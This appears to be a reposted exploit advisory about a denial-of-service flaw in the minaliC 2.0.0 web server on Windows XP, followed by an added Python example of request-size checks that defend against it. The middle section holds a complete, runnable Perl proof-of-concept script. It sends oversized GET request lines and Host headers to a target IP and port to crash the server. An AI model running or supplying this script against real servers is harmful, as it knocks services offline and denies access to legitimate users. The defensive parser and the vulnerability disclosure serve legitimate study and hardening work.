minaliC 2.0.0 has a denial-of-service (DoS) vulnerability that affects Windows XP Professional Service Pack 2 and 3. An attacker can exploit it to crash the server and interrupt service.
🎯 The minaliC 2.0.0 DoS vulnerability can be used against Windows XP Professional Service Pack 2 and 3 (English system). The attacker tried several strategies to improve the reliability and performance of the attack, such as jumping to a static 'call esp' and jumping backwards to code at a known distance from the stack pointer.
🚫 The server did not properly handle requests carrying large amounts of data sent to the web server via the GET method. When the server receives and processes a request from the attacker that contains a large amount of data, it crashes immediately, causing a denial-of-service condition.
💥 During exploitation, the attacker's code generates a large amount of junk data. It creates a socket, connects to the target server and sends a request containing that data, which crashes the server, interrupts service and prevents legitimate users from using it.
#!/usr/bin/perl
use Socket;

# Exploit Title: minaliC 2.0.0 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 03 January 2024
# Vendor Homepage: http://minalic.sourceforge.net/
# Notification vendor: Not reported
# Tested Version: minaliC 2.0.0
# Tested on: Windows XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Video: https://www.youtube.com/watch?v=R_gkEjvpJNw

# 1. Description
# This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
# For this exploit I have tried several strategies to increase reliability and performance:
#   - Jump to a static 'call esp'
#   - Backwards jump to code a known distance from the stack pointer.
# The server did not properly handle requests with large amounts of data sent via method GET to the web server.
# The following request sends a large amount of data to the web server to process via method GET; the server
# will crash as soon as it is received and processed, causing denial of service conditions.
# Successful exploitation of these issues allows remote attackers to crash the affected server, denying service
# to legitimate users.

# 2. Proof of Concept - PoC

# Clear the terminal. $^O is "MSWin32" on Windows perl, so the original test for "windows" never matched.
$sis = "$^O";
if ($sis eq "MSWin32") { $cmd = "cls"; } else { $cmd = "clear"; }
system("$cmd");

intro();
main();

print "[+] Exploiting... \n";

# Oversized request target and Host header value
my $junk = "\x41" x 245;
my $host = "\x41" x 135;

# Send the same request a few times
my $i = 0;
while ($i <= 3) {
    my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n";
    my $sock;
    socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n";
    my $addr = sockaddr_in($port, inet_aton($ip));
    connect($sock, $addr);
    send($sock, $buf, length($buf), 0);
    $i++;
}

print "[+] Done - Exploited success!!!!!\n\n";

sub intro {
    print "\n";
    print " minaliC 2.0.0 - Denial of Service \n";
    print " \n";
    print " Coded by Fernando Mengali \n";
    print " \n";
    print " e-mail: fernando.mengalli\@gmail.com \n";
    print " \n";
    print "\n";
}

sub main {
    # Package variables so the request loop above can read them
    our ($ip, $port) = @ARGV;
    unless (defined($ip) && defined($port)) {
        print " \nUsage: $0 <ip> <port> \n";
        exit(-1);
    }
}
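The crash described above comes from a server that accepts a GET request line and Host header of arbitrary size before processing them. As an added defensive example (not part of the original post and not minaliC's own code), the Python parser below shows the bound check such a server is missing: it reads the request head, enforces a maximum length on the request line and on each header line, and returns a rejection instead of working on the oversized data. The limits, the benign request and the request shaped like the PoC (245-byte path, 135-byte Host value) are all constructed for illustration.

```python
"""Bounded HTTP request-head parser (added example, not minaliC code).

A server that checks the size of the request line and of every header
before doing anything else with them answers an oversized request with
an error instead of crashing.  The limits below are assumptions chosen
for the demonstration, not values from any real server.
"""

MAX_REQUEST_LINE = 200   # assumed cap for "METHOD target HTTP/x.y"
MAX_HEADER_LINE = 100    # assumed cap for one "Name: value" line
MAX_HEADERS = 32         # assumed cap on the number of header lines


def check_request_head(raw: bytes):
    """Validate the head of a raw HTTP request.

    Returns ("ok", parsed) when every component is within its limit,
    otherwise ("reject", reason).  Nothing is copied into a fixed-size
    buffer, so an oversized component can only produce a rejection.
    """
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        return ("reject", "incomplete request head")

    lines = head.split(b"\r\n")
    request_line = lines[0]
    if len(request_line) > MAX_REQUEST_LINE:
        return ("reject", "request line too long (%d bytes)" % len(request_line))

    parts = request_line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return ("reject", "malformed request line")

    header_lines = lines[1:]
    if len(header_lines) > MAX_HEADERS:
        return ("reject", "too many headers (%d)" % len(header_lines))

    headers = {}
    for line in header_lines:
        if len(line) > MAX_HEADER_LINE:
            return ("reject", "header line too long (%d bytes)" % len(line))
        name, colon, value = line.partition(b":")
        if not colon or not name.strip():
            return ("reject", "malformed header line")
        headers[name.strip().lower()] = value.strip()

    return ("ok", {"method": parts[0], "target": parts[1], "headers": headers})


def poc_shaped_request(path_len: int = 245, host_len: int = 135) -> bytes:
    """Constructed sample in the shape of the request the post describes."""
    return (b"GET /" + b"A" * path_len + b" HTTP/1.1\r\n"
            + b"Host: " + b"A" * host_len + b"\r\n\r\n")


# Constructed benign request for comparison
BENIGN_REQUEST = (b"GET /index.html HTTP/1.1\r\n"
                  b"Host: example.test\r\n"
                  b"User-Agent: constructed-sample\r\n\r\n")


if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST),
                       ("oversized path", poc_shaped_request()),
                       ("oversized Host only", poc_shaped_request(path_len=1))):
        verdict, detail = check_request_head(req)
        print("%-20s -> %s: %s" % (label, verdict, detail if verdict == "reject" else detail["target"]))
```

The order of the checks matters: the request line is measured before it is split, and each header line is measured before it is parsed, so no component is handled until its size is known to be acceptable. A rejected request should be answered with a 414 or 431 style error and the connection closed, which keeps the server available to the next client.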